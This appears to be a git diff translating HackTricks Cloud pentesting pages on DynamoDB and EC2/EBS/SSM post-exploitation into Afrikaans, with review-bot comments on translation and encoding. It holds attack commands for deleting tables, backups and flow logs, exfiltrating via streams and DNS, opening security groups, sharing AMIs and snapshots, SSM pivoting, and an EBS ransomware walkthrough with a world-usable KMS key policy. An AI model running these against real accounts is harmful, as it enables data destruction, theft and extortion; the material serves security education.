+Hierdie toestemming laat gebruikers toe om 'n **nuwe item aan die tabel toe te voeg of 'n bestaande item met 'n nuwe item te vervang**. As 'n item met dieselfde primĂȘre sleutel reeds bestaan, sal die **hele item vervang word** met die nuwe item. As die primĂȘre sleutel nie bestaan nie, sal 'n nuwe item met die gespesifiseerde primĂȘre sleutel **gecreĂ«er** word. {{#tabs }} -{{#tab name="XSS Example" }} - +{{#tab name="XSS Voorbeeld" }} ```bash ## Create new item with XSS payload aws dynamodb put-item --table --item file://add.json ### With add.json: { - "Id": { - "S": "1000" - }, - "Name": { - "S": "Marc" - }, - "Description": { - "S": "" - } +"Id": { +"S": "1000" +}, +"Name": { +"S": "Marc" +}, +"Description": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI Voorbeeld" }} ```bash aws dynamodb put-item \ - --table-name ExampleTable \ - --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ - --region +--table-name ExampleTable \ +--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**PotensiĂ«le Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel toe te voeg/wysig ### `dynamodb:UpdateItem` -This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. +Hierdie toestemming laat gebruikers toe om **die bestaande eienskappe van 'n item te wysig of nuwe eienskappe aan 'n item toe te voeg**. 
Dit **vervang nie** die hele item nie; dit werk slegs die gespesifiseerde eienskappe by. As die primĂȘre sleutel nie in die tabel bestaan nie, sal die operasie **'n nuwe item skep** met die gespesifiseerde primĂȘre sleutel en die eienskappe wat in die opdateringuitdrukking gespesifiseer is, stel. {{#tabs }} {{#tab name="XSS Example" }} - ```bash ## Update item with XSS payload aws dynamodb update-item --table \ - --key file://key.json --update-expression "SET Description = :value" \ - --expression-attribute-values file://val.json +--key file://key.json --update-expression "SET Description = :value" \ +--expression-attribute-values file://val.json ### With key.json: { - "Id": { - "S": "1000" - } +"Id": { +"S": "1000" +} } ### and val.json { - ":value": { - "S": "" - } +":value": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI Voorbeeld" }} ```bash aws dynamodb update-item \ - --table-name ExampleTable \ - --key '{"Id": {"S": "1"}}' \ - --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ - --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ - --region +--table-name ExampleTable \ +--key '{"Id": {"S": "1"}}' \ +--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ +--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**PotensiĂ«le Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel by te voeg/wysig ### `dynamodb:DeleteTable` -An attacker with this permission can **delete a DynamoDB table, causing data loss**. - +'n Aanvaller met hierdie toestemming kan **'n DynamoDB-tabel verwyder, wat dataverlies veroorsaak**. 
```bash aws dynamodb delete-table \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -**Potential impact**: Data loss and disruption of services relying on the deleted table. +**PotensiĂ«le impak**: Gegevensverlies en onderbreking van dienste wat op die verwyderde tabel staatmaak. ### `dynamodb:DeleteBackup` -An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**. - +'n Aanvaller met hierdie toestemming kan **'n DynamoDB-rugsteun verwyder, wat moontlik tot gegevensverlies kan lei in die geval van 'n rampherstel-scenario**. ```bash aws dynamodb delete-backup \ - --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ - --region +--backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ +--region ``` - -**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario. +**PotensiĂ«le impak**: Gegevensverlies en onvermoĂ« om van 'n rugsteun te herstel tydens 'n rampherstel-scenario. ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` > [!NOTE] -> TODO: Test if this actually works +> TODO: Toets of dit werklik werk -An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. - -1. Enable a stream on a DynamoDB table: +'n Aanvaller met hierdie toestemmings kan **'n stroom op 'n DynamoDB-tabel aktiveer, die tabel opdateer om veranderinge te begin stroom, en dan toegang tot die stroom verkry om veranderinge aan die tabel in werklike tyd te monitor**. Dit stel die aanvaller in staat om data veranderinge te monitor en te exfiltreer, wat moontlik kan lei tot data lek. +1. 
Aktiveer 'n stroom op 'n DynamoDB-tabel: ```bash bashCopy codeaws dynamodb update-table \ - --table-name TargetTable \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ - --region +--table-name TargetTable \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ +--region ``` - -2. Describe the stream to obtain the ARN and other details: - +2. Beskryf die stroom om die ARN en ander besonderhede te verkry: ```bash bashCopy codeaws dynamodb describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -3. Get the shard iterator using the stream ARN: - +3. Kry die shard iterator met behulp van die stroom ARN: ```bash bashCopy codeaws dynamodbstreams get-shard-iterator \ - --stream-arn \ - --shard-id \ - --shard-iterator-type LATEST \ - --region +--stream-arn \ +--shard-id \ +--shard-iterator-type LATEST \ +--region ``` - -4. Use the shard iterator to access and exfiltrate data from the stream: - +4. Gebruik die shard iterator om toegang te verkry tot en data uit die stroom te exfiltreer: ```bash bashCopy codeaws dynamodbstreams get-records \ - --shard-iterator \ - --region +--shard-iterator \ +--region ``` - -**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. +**PotensiĂ«le impak**: Regte-tyd monitering en data lekkasie van die DynamoDB tabel se veranderinge. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 9ae6a0a4f..21f02432f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md 
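Review bot: In the `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)` section of the DynamoDB privesc hunk above, the sentence now reading `As dit nie geaktiveer is nie, sal jy dit moet **aktiveer** en daarvoor het jy die **`dynamodb:ExportTableToPointInTime`** toestemming nodig` names the wrong permission: the command that follows is `aws dynamodb update-continuous-backups`, which needs `dynamodb:UpdateContinuousBackups` (already listed in the heading), and the English original carried the same slip, so this pass is the moment to fix it. In the streams section the command lines still begin with `bashCopy codeaws dynamodb update-table \`, `bashCopy codeaws dynamodb describe-stream \` and so on; `bashCopy code` is copy-paste residue from a rendered page and should be removed so the commands are pasteable, and while the `TODO: Toets of dit werklik werk` note is open it is worth correcting `aws dynamodb describe-stream --table-name TargetTable` to `aws dynamodbstreams describe-stream --stream-arn <arn>` (the ARN is the `LatestStreamArn` returned by `aws dynamodb describe-table`); the heading's `dynamodb:StreamSpecification` is an `UpdateTable` request parameter, not an IAM action, so enabling the stream only needs `dynamodb:UpdateTable`. Translation consistency: `{{#tab name="XSS Example" }}` in the `dynamodb:UpdateItem` tabs stays English while the `dynamodb:PutItem` tab became `XSS Voorbeeld`; `Exploitatie` and `Gegevensverlies` are Dutch rather than Afrikaans (`uitbuiting` and `dataverlies`, the latter already used in the `dynamodb:DeleteTable` paragraph); and every added line containing a diacritic is double-encoded (`PotensiĂ«le Impak`, `primĂȘre sleutel`, `onvermoĂ«`), so the file should be re-saved as UTF-8 before merge.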
@@ -4,7 +4,7 @@ ## EC2 & VPC -For more information check: +Vir meer inligting, kyk: {{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ @@ -12,10 +12,10 @@ For more information check: ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` -VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\ -An attacker could abuse this to capture all the traffic and obtain sensitive information from it: +VPC-verkeer spieĂ«ling **dubbel die inkomende en uitgaande verkeer vir EC2-instances binne 'n VPC** sonder die behoefte om enigiets op die instances self te installeer. Hierdie gedupliseerde verkeer sou gewoonlik na iets soos 'n netwerk indringing opsporingstelsel (IDS) gestuur word vir analise en monitering.\ +'n Aanvaller kan dit misbruik om al die verkeer te vang en sensitiewe inligting daaruit te verkry: -For more information check this page: +Vir meer inligting, kyk hierdie bladsy: {{#ref}} aws-malicious-vpc-mirror.md 
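Review bot: In the Malicious VPC Mirror hunk, `VPC-verkeer spieĂ«ling **dubbel die inkomende en uitgaande verkeer ...**` uses `dubbel` (an adjective) where a verb is needed; `dupliseer` matches the English "duplicates", and `spieĂ«ling` is the same double-encoded UTF-8 seen throughout the patch (should read `spieëling`). Keep the `{{#ref}}` block and the `aws-malicious-vpc-mirror.md` target exactly as they are, since the link resolves by file name.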
@@ -23,8 +23,7 @@ aws-malicious-vpc-mirror.md ### Copy Running Instance -Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**: - +Instances bevat gewoonlik 'n soort sensitiewe inligting. Daar is verskillende maniere om binne te kom (kyk [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). egter, 'n ander manier om te kyk wat dit bevat, is om **'n AMI te skep en 'n nuwe instance (selfs in jou eie rekening) daaruit te laat loop**: ```shell # List instances aws ec2 describe-images @@ -48,11 +47,10 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups " aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` - ### EBS Snapshot dump -**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ -If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: +**Snapshots is rugste van volumes**, wat gewoonlik **sensitiewe inligting** sal bevat, daarom behoort die nagaan daarvan hierdie inligting te openbaar.\ +As jy 'n **volume sonder 'n snapshot** vind, kan jy: **Skep 'n snapshot** en die volgende aksies uitvoer of net **mont dit in 'n instansie** binne die rekening: {{#ref}} aws-ebs-snapshot-dump.md 
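Review bot: In the EBS Snapshot dump hunk the new line `**Snapshots is rugste van volumes**` has a truncated word; it should be `rugsteune van volumes` (backups of volumes), and `net **mont dit in 'n instansie**` should be `monteer dit`, the form used for "mount" elsewhere in the translation. In the Copy Running Instance hunk just above it, `... aws-ec2-privesc.md)). egter, 'n ander manier ...` starts a sentence with lowercase `egter`; capitalise it (`Egter, ...`) or fold it into the preceding sentence as the English `However,` was.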
@@ -62,197 +60,178 @@ aws-ebs-snapshot-dump.md #### DNS Exfiltration -Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. +Selfs as jy 'n EC2 sluit sodat geen verkeer kan uitgaan nie, kan dit steeds **exfil via DNS**. -- **VPC Flow Logs will not record this**. -- You have no access to AWS DNS logs. -- Disable this by setting "enableDnsSupport" to false with: +- **VPC Flow Logs sal dit nie opteken nie**. +- Jy het geen toegang tot AWS DNS logs nie. +- Deaktiveer dit deur "enableDnsSupport" op vals te stel met: - `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` +`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` #### Exfiltration via API calls -An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs. +'n Aanvaller kan API eindpunte van 'n rekening wat deur hom beheer word, aanroep. Cloudtrail sal hierdie oproepe opteken en die aanvaller sal in staat wees om die exfiltreer data in die Cloudtrail logs te sien. ### Open Security Group -You could get further access to network services by opening ports like this: - +Jy kan verdere toegang tot netwerkdienste verkry deur poorte soos volg te open: ```bash aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC ``` +### Privesc na ECS -### Privesc to ECS +Dit is moontlik om 'n EC2-instantie te draai en dit te registreer om gebruik te word om ECS-instanties te draai en dan die ECS-instanties se data te steel. -It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data. - -For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs). 
- -### Remove VPC flow logs +Vir [**meer inligting, kyk hier**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs). +### Verwyder VPC vloei logs ```bash aws ec2 delete-flow-logs --flow-log-ids --region ``` - ### SSM Port Forwarding -Required permissions: +Benodigde toestemmings: - `ssm:StartSession` -In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. -One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster. +Benewens opdraguitvoering, laat SSM vir verkeers-tunneling wat misbruik kan word om te pivot van EC2-instanties wat nie netwerktoegang het nie weens Veiligheidsgroepe of NACLs. Een van die scenario's waar dit nuttig is, is om te pivot van 'n [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) na 'n private EKS-kluster. -> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html - -1. Install the SessionManagerPlugin on your machine -2. Log in to the Bastion EC2 using the following command: +> Om 'n sessie te begin, moet jy die SessionManagerPlugin geĂŻnstalleer hĂȘ: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html +1. Installeer die SessionManagerPlugin op jou masjien +2. Meld aan by die Bastion EC2 met die volgende opdrag: ```shell aws ssm start-session --target "$INSTANCE_ID" ``` - -3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script -4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile -5. 
Log in to EKS as the Bastion EC2: - +3. Kry die Bastion EC2 AWS tydelike geloofsbriewe met die [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) skrip +4. Oordra die geloofsbriewe na jou eie masjien in die `$HOME/.aws/credentials` lĂȘer as `[bastion-ec2]` profiel +5. Meld aan by EKS as die Bastion EC2: ```shell aws eks update-kubeconfig --profile bastion-ec2 --region --name ``` - -6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost` -7. Create an SSM tunnel as follows: - +6. Werk die `server` veld in die `$HOME/.kube/config` lĂȘer op om na `https://localhost` te verwys +7. Skep 'n SSM-tonnel soos volg: ```shell sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region ``` - -8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: - +8. Die verkeer van die `kubectl` hulpmiddel word nou deur die SSM-tonnel via die Bastion EC2 gestuur en jy kan die private EKS-kluster vanaf jou eie masjien toegang verkry deur die volgende uit te voer: ```shell kubectl get pods --insecure-skip-tls-verify ``` +Let wel, die SSL-verbindinge sal misluk tensy jy die `--insecure-skip-tls-verify ` vlag (of sy ekwivalent in K8s-auditgereedskap) stel. Aangesien die verkeer deur die veilige AWS SSM-tonnel getunnel word, is jy veilig teen enige vorm van MitM-aanvalle. -Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. - -Finally, this technique is not specific to attacking private EKS clusters. 
You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. - -### Share AMI +Laastens, hierdie tegniek is nie spesifiek vir die aanval op private EKS-klusters nie. Jy kan arbitrĂȘre domeine en poorte stel om na enige ander AWS-diens of 'n pasgemaakte toepassing te pivot. +### Deel AMI ```bash aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region ``` +### Soek sensitiewe inligting in openbare en private AMI's -### Search sensitive information in public and private AMIs - -- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. - -### Share EBS Snapshot +- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is 'n hulpmiddel wat ontwerp is om **sensitiewe inligting binne openbare of private Amazon Machine Images (AMIs) te soek**. Dit outomatiseer die proses om instansies van teiken AMI's te begin, hul volumes te monteer, en te skandeer vir potensiĂ«le geheime of sensitiewe data. +### Deel EBS Snapshot ```bash aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region ``` - ### EBS Ransomware PoC -A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it. - -First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. 
Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption' +'n Bewys van konsep soortgelyk aan die Ransomware demonstrasie wat in die S3 post-exploitation notas gedemonstreer is. KMS moet hernoem word na RMS vir Ransomware Bestuurdiens met hoe maklik dit is om verskeie AWS dienste te enkripteer met behulp daarvan. +Eerstens, vanaf 'n 'aanvaller' AWS rekening, skep 'n kliĂ«nt bestuurde sleutel in KMS. Vir hierdie voorbeeld sal ons net hĂȘ dat AWS die sleuteldata vir my bestuur, maar in 'n realistiese scenario sou 'n kwaadwillige akteur die sleuteldata buite AWS se beheer hou. Verander die sleutelbeleid om enige AWS rekening Prinsipaal toe te laat om die sleutel te gebruik. Vir hierdie sleutelbeleid was die rekening se naam 'AttackSim' en die beleidsreĂ«l wat alle toegang toelaat, word 'Buite Enkripsie' genoem. ``` { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Outside 
Encryption", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey", - "kms:GenerateDataKeyWithoutPlainText", - "kms:CreateGrant" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:CreateGrant", - "kms:ListGrants", - "kms:RevokeGrant" - ], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", +"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Outside Encryption", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey", +"kms:GenerateDataKeyWithoutPlainText", +"kms:CreateGrant" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, 
+"Action": [ +"kms:CreateGrant", +"kms:ListGrants", +"kms:RevokeGrant" +], +"Resource": "*", +"Condition": { +"Bool": { +"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: +Die sleutelbeleidreĂ«l benodig die volgende geaktiveer om die vermoĂ« te hĂȘ om dit te gebruik om 'n EBS-volume te enkripteer: - `kms:CreateGrant` - `kms:Decrypt` 
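Review bot: In the EBS Ransomware PoC paragraph of this hunk the policy statement Sid is translated as `'Buite Enkripsie'` while the JSON that follows keeps `"Sid": "Outside Encryption"`; the reader has to locate that Sid in the policy, so keep it untranslated and quoted (`'Outside Encryption'`) in the prose, the same way the account name `'AttackSim'` was left alone. Heading translation is inconsistent within the hunk: `#### DNS Exfiltration`, `#### Exfiltration via API calls`, `### Open Security Group`, `### SSM Port Forwarding` and `### EBS Ransomware PoC` stay English while `### Privesc na ECS`, `### Verwyder VPC vloei logs`, `### Deel AMI`, `### Deel EBS Snapshot` and `### Soek sensitiewe inligting in openbare en private AMI's` are translated; choose one rule, bearing in mind that translated headings change the generated anchor slugs, so any fragment link into this page (the same pattern as the `#privesc-to-ecs` link used in this hunk) will break. Grammar: `laat SSM vir verkeers-tunneling wat misbruik kan word` drops the verb particle; `laat SSM verkeers-tunneling toe, wat misbruik kan word` renders "SSM allows for traffic tunneling". Finally, the whole key-policy JSON is re-emitted with every line flush-left; that is roughly seventy lines of whitespace-only churn that buries the real changes and makes the policy harder to read, so restore the original indentation inside the fenced block.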
@@ -260,222 +239,214 @@ The key policy rule needs the following enabled to allow for the ability to use - `kms:GenerateDataKeyWithoutPlainText` - `kms:ReEncrypt` -Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. +Nou met die publiek toeganklike sleutel om te gebruik. Ons kan 'n 'slagoffer' rekening gebruik wat 'n paar EC2-instanse het met ongeĂ«nkripteerde EBS-volumes aangeheg. Hierdie 'slagoffer' rekening se EBS-volumes is wat ons teiken vir enkripsie, hierdie aanval is onder die veronderstelde oortreding van 'n hoĂ«-bevoegdheid AWS-rekening. ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459) -Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) +Soos in die S3 ransomware voorbeeld. 
Hierdie aanval sal kopieĂ« van die aangehegte EBS-volumes skep met behulp van snapshots, die publiek beskikbare sleutel van die 'aanvaller' rekening gebruik om die nuwe EBS-volumes te enkripteer, dan die oorspronklike EBS-volumes van die EC2-instanse af te ontkoppel en dit te verwyder, en dan uiteindelik die snapshots wat gebruik is om die nuut enkripteerde EBS-volumes te skep, te verwyder. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) -This results in only encrypted EBS volumes left available in the account. +Dit lei tot slegs enkripteerde EBS-volumes wat beskikbaar is in die rekening. ![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220) -Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now. +Dit is ook die moeite werd om te noem, die skrip het die EC2-instanse gestop om die oorspronklike EBS-volumes te ontkoppel en te verwyder. Die oorspronklike ongeĂ«nkripteerde volumes is nou weg. ![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e) -Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy. - +Volgende, keer terug na die sleutelbeleid in die 'aanvaller' rekening en verwyder die 'Buitelandse Enkripsie' beleidreĂ«l uit die sleutelbeleid. 
```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", 
